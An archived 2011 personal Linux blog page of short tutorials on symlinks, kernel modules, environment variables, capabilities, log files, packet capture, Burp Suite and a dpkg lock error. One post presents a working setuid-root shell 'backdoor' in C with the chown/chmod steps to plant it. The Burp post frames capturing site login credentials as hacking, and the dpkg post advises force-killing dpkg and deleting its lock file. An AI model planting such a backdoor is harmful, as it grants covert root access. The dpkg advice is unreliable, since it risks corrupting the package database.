PoiNtEr->: August 2011

                             Difference between a dream and an aim. A dream requires soundless sleep, whereas an aim requires sleepless efforts.


Friday, August 19, 2011

GATE 2012 CS Full Study Material

Sunday, August 14, 2011

How to create a soft link with the ln command in Linux

To make links between files you need to use the ln command. A symbolic link (also known as a soft link or symlink) is a special type of file that serves as a reference to another file or directory. Unix/Linux-like operating systems make extensive use of symbolic links.
Two types of links

There are two types of links:

    symbolic links: refer to a symbolic path indicating the abstract location of another file
    hard links: refer to the specific location of physical data

How do I create a soft link / symbolic link?

To create a symbolic link in Unix or Linux, at the shell prompt, enter the following command:
ln -s {target-filename} {symbolic-filename}

For example, to create a soft link for /home/vishal/Desktop/syllabi.pdf as /home/vishal/study/syllabi1.pdf, enter the following commands:
ln -s /home/vishal/Desktop/syllabi.pdf  /home/vishal/study/syllabi1.pdf
ls -l /home/vishal/study/syllabi1.pdf


Output:

lrwxrwxrwx 1 vishal  vishal    16 2011-08-12 22:53 syllabi1.pdf -> /home/vishal/Desktop/syllabi.pdf
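
If you ever need to create a symbolic link from a C program instead of the shell, the POSIX symlink() call does the same job. Below is a minimal sketch (the paths are just the example paths used above, and error handling is kept short):

#include <stdio.h>
#include <unistd.h>

int main(void)
{
        const char *target = "/home/vishal/Desktop/syllabi.pdf";
        const char *link   = "/home/vishal/study/syllabi1.pdf";
        char buf[4096];
        ssize_t len;

        if (symlink(target, link) == -1) {              /* create link -> target */
                perror("symlink");
                return 1;
        }
        len = readlink(link, buf, sizeof(buf) - 1);     /* read the link back */
        if (len == -1) {
                perror("readlink");
                return 1;
        }
        buf[len] = '\0';
        printf("%s -> %s\n", link, buf);
        return 0;
}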

Saturday, August 13, 2011

My first Linux kernel module ...Hello World!!


Hi guys. Today we are going to learn something about kernels: we will write and load a module into our Linux operating system. Before doing that, I request you to google the difference between a microkernel and a monolithic kernel. My question is: why are we interested in kernels at all?
I think the obvious answer is that if you know every basic thing about your system and how it is implemented, then you can also break it very easily.
So now, time for a little warning: if you love your laptop, think before trying this. No, there is no real harm, but the probability of something going wrong is higher than usual because you are dealing with the heart (core) of the system.



The module_init() macro defines which function is to be called at module insertion time (if the file is compiled as a module), or at boot time: if the file is not compiled as a module the module_init() macro becomes equivalent to __initcall(), which through linker magic ensures that the function is called on boot.
The function can return a negative error number to cause module loading to fail (unfortunately, this has no effect if the module is compiled into the kernel). For modules, this is called in user context, with interrupts enabled, and the kernel lock held, so it can sleep.

The module_exit() macro defines the function to be called at module removal time (or never, in the case of a file compiled into the kernel). It will only be called if the module usage count has reached zero. This function can also sleep, but cannot fail: everything must be cleaned up by the time it returns.


Code: hello_world.c


#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/init.h>
#include <linux/version.h>

MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("This is my first test module...!");
MODULE_AUTHOR("Vishal Mishra");

/* Called when the module is loaded (insmod). */
static int __init my_start_init(void)
{
        printk(KERN_INFO "Hello World module loaded...!\n");
        return 0;       /* 0 means successful initialisation */
}

/* Called when the module is removed (rmmod). */
static void __exit my_remove_exit(void)
{
        printk(KERN_INFO "Hello World module Un-loaded...!\n");
}

module_init(my_start_init);
module_exit(my_remove_exit);






Makefile:


obj-m   :=      hello_world.o

all:
        make -C /lib/modules/$(shell uname -r)/build/ M=$(shell pwd) modules

clean:
        make -C /lib/modules/$(shell uname -r)/build/ M=$(shell pwd) clean



Now save the above code as Makefile in the same folder in which hello_world.c is present (note that the indented command lines in a Makefile must begin with a tab character). Then run make in that folder; this builds hello_world.ko, which you can load into the running kernel with sudo insmod hello_world.ko.




Now you can run the following commands to get information about your newly installed module:

1: modinfo hello_world.ko
2: lsmod   (this command will list all loaded modules, so you can check whether hello_world is there or not)

For more on Linux kernel module programming, check out my new post, which explains each function used above in detail here.

Reference:
Tutorials - OSDev Wiki
 http://linuxpoison.blogspot.com/2008/01/want-to-write-linux-kernel.html
 http://linuxkernel51.blogspot.com/2011/03/lodable-kernel-module.html
http://tldp.org/LDP/lkmpg/2.6/html/index.html

Thursday, August 11, 2011

Printing the Execution Environment in C language

Enumerating all the variables in the environment is a little trickier. To do this, you must access a special global variable named environ, which is defined in the GNU C library. This variable, of type char**, is a NULL-terminated array of pointers to character strings. Each string contains one environment variable, in the form VARIABLE=value.


#include <stdio.h>

/* environ is provided by the C library: a NULL-terminated array of
 * "VARIABLE=value" strings. */
extern char **environ;

int main(void)
{
        char **var;
        for (var = environ; *var != NULL; ++var)
                printf("%s\n", *var);
        return 0;
}


Output: each environment variable is printed on its own line, in the form VARIABLE=value.

Now that you know each and every environment variable's value, you can use them to hack around on the system... try it!
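
For completeness: if you only need one variable rather than the whole environment, the standard getenv() function is the easier route. A minimal sketch (HOME is just an example variable name; getenv() returns NULL if the variable is not set):

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
        const char *home = getenv("HOME");      /* look up a single variable */
        if (home != NULL)
                printf("HOME=%s\n", home);
        else
                printf("HOME is not set\n");
        return 0;
}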

Wednesday, August 10, 2011

How to give a normal user superuser privileges? ..Linux Hack


#include <unistd.h>

int main(void)
{
        char *name[2];

        /* Become root.  This only succeeds if the binary is owned by
         * root and has the setuid bit set (see below). */
        if (setuid(0) != 0)
                return 1;

        /* Spawn a root shell. */
        name[0] = "/bin/sh";
        name[1] = NULL;
        execve(name[0], name, NULL);
        return 0;
}


Save this file as backdoor.c and compile it. For the setuid(0) call to succeed, the binary must be owned by root and have the setuid bit set, so while you still have root access run:

chown root:root b
chmod u+s b

That's it. Now run the output file from a normal user account:
Vishal@Eva$ ./b      (suppose the name of the output file is b)
$
Now check your uid:
$ id -u
0
Output "0" confirms that you have superuser privileges now.
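
If you prefer to check the same thing from C instead of with id -u, getuid() and geteuid() report the real and effective user IDs of the calling process. A minimal sketch:

#include <stdio.h>
#include <unistd.h>

int main(void)
{
        printf("real uid:      %d\n", (int)getuid());
        printf("effective uid: %d\n", (int)geteuid());  /* this is what `id -u` prints */
        return 0;
}

If both print 0 after running the backdoor, the setuid trick worked.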

Tuesday, August 9, 2011

How to remove Linux kernel capabilities and make root handicapped??

As you may know, Linux has capabilities. Maybe you don't need all of them; if that is your case, you are in luck, since you can remove them using the lcap tool.
To list all Linux capabilities:
~# lcap
Current capabilities: 0xFFFDFCFF
   0) *CAP_CHOWN                     1) *CAP_DAC_OVERRIDE
   2) *CAP_DAC_READ_SEARCH           3) *CAP_FOWNER
   4) *CAP_FSETID                    5) *CAP_KILL
   6) *CAP_SETGID                    7) *CAP_SETUID
   8) *CAP_SETPCAP                   9) *CAP_LINUX_IMMUTABLE
  10) *CAP_NET_BIND_SERVICE         11) *CAP_NET_BROADCAST
  12) *CAP_NET_ADMIN                13) *CAP_NET_RAW
  14) *CAP_IPC_LOCK                 15) *CAP_IPC_OWNER
  16) *CAP_SYS_MODULE               17)  CAP_SYS_RAWIO
  18) *CAP_SYS_CHROOT               19) *CAP_SYS_PTRACE
  20) *CAP_SYS_PACCT                21) *CAP_SYS_ADMIN
  22) *CAP_SYS_BOOT                 23) *CAP_SYS_NICE
  24) *CAP_SYS_RESOURCE             25) *CAP_SYS_TIME
  26) *CAP_SYS_TTY_CONFIG           27) *CAP_MKNOD
  28) *CAP_LEASE                    29) *CAP_AUDIT_WRITE
  30) *CAP_AUDIT_CONTROL
    * = Capabilities currently allowed

For example, I want to disable CAP_CHOWN, so that no user (including root) has the possibility to change a file's owner. In this case, the file becomes UNCHOWNABLE.
Usual way:
# touch filename
# chown vishal filename
Now the file is owned by vishal
My preferred way:
First, we remove CHOWN capability
(as root)
# lcap CAP_CHOWN
# touch filename
# chown vishal filename
chown: changing ownership of `filename': Operation not permitted
As you can see, chown does not work as expected, since we have removed that capability. To restore it, you need to reboot.
You can disable any capability at your own risk ;)
This tool is interesting: with a few changes/updates you can use it to increase security. For example, to remove the possibility of loading/unloading a module, drop CAP_SYS_MODULE; it helps a bit against rootkits. For files that you don't want modified in any way, you can use CAP_LINUX_IMMUTABLE on /bin, /usr/bin, /sbin, /usr/sbin to keep the expected binaries in place (checksums). Try playing with any capability and see if it is interesting for you.
For further info: man lcap
or click here
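
For what it's worth, lcap relied on the kernel's old global capability bounding set, which later kernels removed. On 2.6.25 and newer kernels there is a per-process equivalent: prctl(PR_CAPBSET_DROP, ...). The sketch below is my own illustration, not part of lcap; it drops CAP_SYS_MODULE for the calling process (and anything it later execs), and it must be run as root because it needs CAP_SETPCAP:

#include <stdio.h>
#include <sys/prctl.h>
#include <linux/capability.h>

int main(void)
{
        /* Remove CAP_SYS_MODULE from this process's bounding set, so
         * nothing started from here can load or unload kernel modules. */
        if (prctl(PR_CAPBSET_DROP, CAP_SYS_MODULE, 0, 0, 0) == -1) {
                perror("prctl(PR_CAPBSET_DROP)");
                return 1;
        }
        printf("CAP_SYS_MODULE dropped from the bounding set\n");
        return 0;
}

Unlike lcap, this only affects one process tree rather than the whole system, and the change lasts until that process exits.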


Ubuntu(Linux) Log files and usage

 

It is really important at times to check log files, whether you are working on your home system, on a server, or anywhere else. So let's see how we can do that in Ubuntu (Linux); this will work for most Linux distributions. The first thing we must know is which log file contains what, and where it is located on our system, so that we can access it according to our need (a small C example of following a log file, tail -f style, appears right after the list below).

=> /var/log/messages or /var/log/syslog : General log messages
=> /var/log/boot : System boot log
=> /var/log/debug : Debugging log messages
=> /var/log/auth.log : User login and authentication logs
=> /var/log/daemon.log : Running services such as squid, ntpd and others log message to this file
=> /var/log/dmesg : Linux kernel ring buffer log
=> /var/log/dpkg.log : All binary package log includes package installation and other information
=> /var/log/faillog : User failed login log file
=> /var/log/kern.log : Kernel log file
=> /var/log/lpr.log : Printer log file
=> /var/log/mail.* : All mail server message log files
=> /var/log/mysql.* : MySQL server log file
=> /var/log/user.log : All userlevel logs
=> /var/log/Xorg.0.log : X.org log file
=> /var/log/apache2/* : Apache web server log files directory
=> /var/log/lighttpd/* : Lighttpd web server log files directory
=> /var/log/fsck/* : fsck command log
=> /var/log/apport.log : Application crash report / log file
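
In day-to-day use you will mostly read these files with less, grep or tail -f, but the idea behind "following" a log is simple enough to show in a few lines of C. A minimal sketch, assuming /var/log/syslog as the file to watch (on some systems the equivalent file is /var/log/messages; reading it may require root):

#include <stdio.h>
#include <unistd.h>

int main(void)
{
        const char *path = "/var/log/syslog";   /* example log file */
        char line[1024];
        FILE *fp = fopen(path, "r");

        if (fp == NULL) {
                perror(path);
                return 1;
        }
        fseek(fp, 0, SEEK_END);                 /* start at the current end of the file */

        for (;;) {
                if (fgets(line, sizeof(line), fp) != NULL) {
                        fputs(line, stdout);    /* print each newly appended line */
                        fflush(stdout);
                } else {
                        clearerr(fp);           /* clear EOF and wait for more data */
                        sleep(1);
                }
        }
        /* never reached; stop the program with CTRL+C */
}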




View log files using a GUI tool: the GNOME System Log Viewer

System Log Viewer is a graphical, menu-driven viewer that you can use to view and monitor your system logs. System Log Viewer comes with a few functions that can help you manage your logs, including a calendar, log monitor and log statistics display. System Log Viewer is useful if you are new to system administration because it provides an easier, more user-friendly display of your logs than a text display of the log file. It is also useful for more experienced administrators, as it contains a calendar to help you locate trends and track problems, as well as a monitor to enable you to continuously monitor crucial logs.
You can start System Log Viewer in the following ways:
Click on System menu > Choose Administration > Log file viewer:




(The GNOME System Log Viewer)
Note you can start the GNOME System Log Viewer from a shell prompt, by entering the following command:
$ gnome-system-log &

Monday, August 8, 2011

What does Ubuntu mean???

Ubuntu is a South African ethical ideology focusing on people's allegiances and relations with each other. The word comes from the Zulu and Xhosa languages. Ubuntu is seen as a traditional African concept, is regarded as one of the founding principles of the new republic of South Africa and is connected to the idea of an African Renaissance.

A rough translation of the principle of Ubuntu is "humanity towards others". Another translation could be: "The belief in a universal bond of sharing that connects all humanity".


                                                             


"A person with ubuntu is open and available to others, affirming of others, does not feel threatened that others are able and good, for he or she has a proper self-assurance that comes from knowing that he or she belongs in a greater whole and is diminished when others are humiliated or diminished, when others are tortured or oppressed."
 -- Archbishop Desmond Tutu

As a platform based on Free software, the Ubuntu operating system brings the spirit of ubuntu to the software world.

The Ubuntu project is entirely committed to the principles of free software development; people are encouraged to use free software, improve it, and pass it on.

"Free software" doesn't mean that you shouldn't have to pay for it (although Ubuntu is committed to being free of charge as well). It means that you should be able to use the software in any way you wish: the code that makes up free software is available for anyone to download, change, fix, and use in any way. Alongside ideological benefits, this freedom also has technical advantages: when programs are developed, the hard work of others can be used and built upon. With non-free software, this cannot happen and when programs are developed, they have to start from scratch. For this reason the development of free software is fast, efficient and exciting!

What is Akamai Technologies?

 

 

While tracing my network I came across this "akamaitechnologies" name; I was constantly getting packets from its servers, so I finally googled it and came to know about the company.

 

The company was founded in 1998 by then-MIT graduate student Daniel M. Lewin, and MIT Applied Mathematics professor Tom Leighton.

Akamai transparently mirrors content—sometimes all site content including HTML, CSS, and software downloads, and sometimes just media objects such as audio, graphics, animation, and video—from customer servers. Though the domain name (but not subdomain) is the same, the IP address points to an Akamai server rather than the customer's server. The Akamai server is automatically picked depending on the type of content and the user's network location.

The benefit is that users can receive content from whichever Akamai server is close to them or has a good connection, leading to faster download times and less vulnerability to network congestion or outages.

In addition to content caching, Akamai provides services that accelerate dynamic and personalized content, J2EE-compliant applications, and streaming media.

 

(Diagram: the Akamai content-delivery process for an "Akamaized" website)

 

 

In the diagram shown, we see an "Akamaized" website; this simply means that certain content within the website (usually media objects such as audio, graphics, animation, video) will not point to servers owned by the original website, in this case ACME, but to servers owned by Akamai. It is important to note that even though the domain is the same, namely www.acme.com and image.acme.com, the IP address (server) that image.acme.com points to is actually owned by Akamai and not ACME.

Step 1. The client's browser requests the default web page at the ACME site. The site returns the web page index.html.

Step 2. If the HTML code is examined, you can see that there is a link to an image hosted on the Akamai-owned server image.acme.com.

Step 3. As your web browser parses the HTML code, it pulls the image object bigpicture.jpg from image.acme.com.
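
You can check this redirection yourself by resolving the hostnames a page references. The sketch below uses the standard getaddrinfo() call to print every address a name resolves to; image.acme.com is only the example name from the diagram, so substitute a hostname you have actually seen in your traces:

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>

int main(void)
{
        const char *host = "image.acme.com";    /* example hostname only */
        struct addrinfo hints, *res, *p;
        char addr[INET6_ADDRSTRLEN];
        int err;

        memset(&hints, 0, sizeof(hints));
        hints.ai_family = AF_UNSPEC;            /* both IPv4 and IPv6 */
        hints.ai_socktype = SOCK_STREAM;

        err = getaddrinfo(host, NULL, &hints, &res);
        if (err != 0) {
                fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(err));
                return 1;
        }
        for (p = res; p != NULL; p = p->ai_next) {
                void *a = (p->ai_family == AF_INET)
                        ? (void *)&((struct sockaddr_in *)p->ai_addr)->sin_addr
                        : (void *)&((struct sockaddr_in6 *)p->ai_addr)->sin6_addr;
                inet_ntop(p->ai_family, a, addr, sizeof(addr));
                printf("%s resolves to %s\n", host, addr);
        }
        freeaddrinfo(res);
        return 0;
}

If the name is "Akamaized", a reverse lookup of the printed addresses will often end in akamaitechnologies.com, which is exactly what showed up in my traces.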

Using tcpdump and Wireshark to capture packets on a Linux system


The following command will capture all packets on the eth0 network interface and log them to a file called packets.tcpdump.
tcpdump -i eth0 -s 0 -U -w packets.tcpdump
tcpdump will continue to run in the foreground while you generate the network activity.  When you're done, press CTRL+C to stop tcpdump.  Note that running tcpdump in this manner could have an adverse effect on network performance, so you should not leave this running in a production environment.
Capturing all packets also has a potential to use a lot of disk space if your network is busy.  If you're having trouble finding the traffic you want because the dump is too large, consider passing additional arguments to tcpdump to filter the types of packets that are captured, e.g., only packets from a certain IP address or only packets on a certain port.
The following command will only capture TCP packets destined for or originating from port 80.
tcpdump -i eth0 -s 0 -U -w port-80-packets.tcpdump tcp port 80
Of course, the downside to filtering the dump at capture-time is that you may miss something that helps you debug the problem you're encountering.  If you can afford the disk space and your network is not that busy, it may be better to capture all packets and just use a view filter in Wireshark to help you find what you're looking for.
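
Both tcpdump and Wireshark are built on top of the libpcap library. If you are curious what a capture loop looks like underneath, here is a minimal sketch; it is only an illustration, not how tcpdump itself is written. "eth0" is just the interface name from the commands above; build with -lpcap and run it as root:

#include <stdio.h>
#include <pcap.h>

/* Called by libpcap once for every captured packet. */
static void handle_packet(u_char *user, const struct pcap_pkthdr *hdr,
                          const u_char *bytes)
{
        (void)user;
        (void)bytes;
        printf("captured packet: %u bytes\n", hdr->len);
}

int main(void)
{
        char errbuf[PCAP_ERRBUF_SIZE];
        pcap_t *handle;

        /* interface, snaplen, promiscuous mode, read timeout (ms), error buffer */
        handle = pcap_open_live("eth0", 65535, 1, 1000, errbuf);
        if (handle == NULL) {
                fprintf(stderr, "pcap_open_live: %s\n", errbuf);
                return 1;
        }
        pcap_loop(handle, 10, handle_packet, NULL);     /* capture 10 packets, then stop */
        pcap_close(handle);
        return 0;
}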

To install Wireshark in Ubuntu, use the following command:

sudo apt-get install wireshark

To open Wireshark, press Alt+F2 and give the following command in the run box:

gksudo wireshark


Wireshark is the best utility for capturing packets that I have ever come across; I recommend it to every Linux noob.

How to use Burp Suite?

What is the Burp Suite?
Burp Suite is an integrated platform for attacking web applications. It contains all of the Burp tools with numerous interfaces between them designed to facilitate and speed up the process of attacking an application. All tools share the same robust framework for handling HTTP requests, persistence, authentication, upstream proxies, logging, alerting and extensibility.
Burp Suite allows you to combine manual and automated techniques to enumerate, analyse, scan, attack and exploit web applications. The various Burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another.
Source: http://www.portswigger.net/suite/
The Burp Suite is made up of the following tools (descriptions taken from the PortSwigger website):
Proxy: Burp Proxy is an interactive HTTP/S proxy server for attacking and testing web applications. It operates as a man-in-the-middle between the end browser and the target web server, and allows the user to intercept, inspect and modify the raw traffic passing in both directions.
Spider: Burp Spider is a tool for mapping web applications. It uses various intelligent techniques to generate a comprehensive inventory of an application’s content and functionality.
Scanner: Burp Scanner is a tool for performing automated discovery of security vulnerabilities in web applications. It is designed to be used by penetration testers, and to fit in closely with your existing techniques and methodologies for performing manual and semi-automated penetration tests of web applications.
Intruder: Burp Intruder is a tool for automating customised attacks against web applications.
Repeater: Burp Repeater is a tool for manually modifying and reissuing individual HTTP requests, and analysing their responses. It is best used in conjunction with the other Burp Suite tools. For example, you can send a request to Repeater from the target site map, from the Burp Proxy browsing history, or from the results of a Burp Intruder attack, and manually adjust the request to fine-tune an attack or probe for vulnerabilities.
Sequencer: Burp Sequencer is a tool for analysing the degree of randomness in an application’s session tokens or other items on whose unpredictability the application depends for its security.
Decoder: Burp Decoder is a simple tool for transforming encoded data into its canonical form, or for transforming raw data into various encoded and hashed forms. It is capable of intelligently recognising several encoding formats using heuristic techniques.
Enabling the Burp Suite Proxy
To begin using the Burp Suite to test our example web application, we need to configure our web browser to use the Burp Suite as a proxy. The Burp Suite proxy will use port 8080 by default, but you can change this if you want to.
You can see in the image below that I have configured Firefox to use the Burp Suite proxy for all traffic:
(Screenshot: Firefox proxy configuration)
When you open the Burp Suite proxy tool, you can check that the proxy is running by clicking on the options tab:
(Screenshot: the Burp Proxy options tab)

You can see that the proxy is using the default port:
(Screenshot: the proxy listener on the default port 8080)

The proxy is now running and ready to use. You can see that the proxy options tab has quite a few items that we can configure to meet our testing needs.
Now the main phase: we log in to a Facebook, Orkut, MySpace or any other website's account and try to capture the username and password using Burp. Let's see how I do it... let the hacking begin. (This is only for study purposes; don't misuse it.)

To do this, we must ensure that the Burp Suite proxy is configured to intercept our requests:
(Screenshot: intercept enabled in the Proxy tab)

With intercept enabled, we submit the logon form and send the captured request to Intruder, as you can see below:
(Screenshots: the intercepted logon request and the "send to Intruder" action)
The Burp Suite will send our request to the Intruder tool so we can begin our testing. You can see the request in the Intruder tool below:
(Screenshot: the request loaded in the Intruder tool)
The tool has automatically created payload positions for us. The payload positions are defined using the § character; Intruder will replace the value between two § characters with one of our test inputs.
The Positions tab, which is shown in the image above, has four different attack types for you to choose from (definitions taken from http://www.portswigger.net/intruder/help.html):

Saturday, August 6, 2011

Could not get lock /var/lib/dpkg/lock - open (11: Resource temporarily unavailable) in ubuntu ???

Checked for "is another process using it?":
Code:

ps aux  | egrep -i 'apt|ftp|kpack|dpkg'  | less

I killed them all anyway, just to be sure:
Code:

killall -9 apt* kpackage dpkg


If you ever use Synaptic (it's removed from my system), you should include it as well:
Code:

killall -9 apt* kpackage dpkg synaptic


Having confirmed that there were no "rogue" package managers running, I checked, removed, and rechecked the lock file:
Code:

ls -l /var/lib/dpkg/lock
rm -f /var/lib/dpkg/lock
ls -l /var/lib/dpkg/lock
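
The "(11: Resource temporarily unavailable)" part of that message is errno 11, EAGAIN: some other process is holding a lock on the file. Before killing processes or deleting the lock file, you can simply ask who holds it. The sketch below assumes dpkg uses fcntl()-style locking on /var/lib/dpkg/lock (which is what the EAGAIN error suggests) and uses F_GETLK to report the owning process without disturbing anything; run it as root:

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>

int main(void)
{
        const char *path = "/var/lib/dpkg/lock";
        struct flock fl = { .l_type = F_WRLCK, .l_whence = SEEK_SET };
        int fd = open(path, O_RDWR);

        if (fd == -1) {
                perror(path);
                return 1;
        }
        /* F_GETLK does not take the lock; it only reports whether a
         * conflicting lock exists and, if so, which process owns it. */
        if (fcntl(fd, F_GETLK, &fl) == -1) {
                perror("fcntl");
                return 1;
        }
        if (fl.l_type == F_UNLCK)
                printf("no one holds the lock; apt/dpkg should run fine\n");
        else
                printf("lock is held by process %d\n", (int)fl.l_pid);

        close(fd);
        return 0;
}

If it prints a PID, that is the package manager you need to wait for (or stop) instead of removing the lock file blindly.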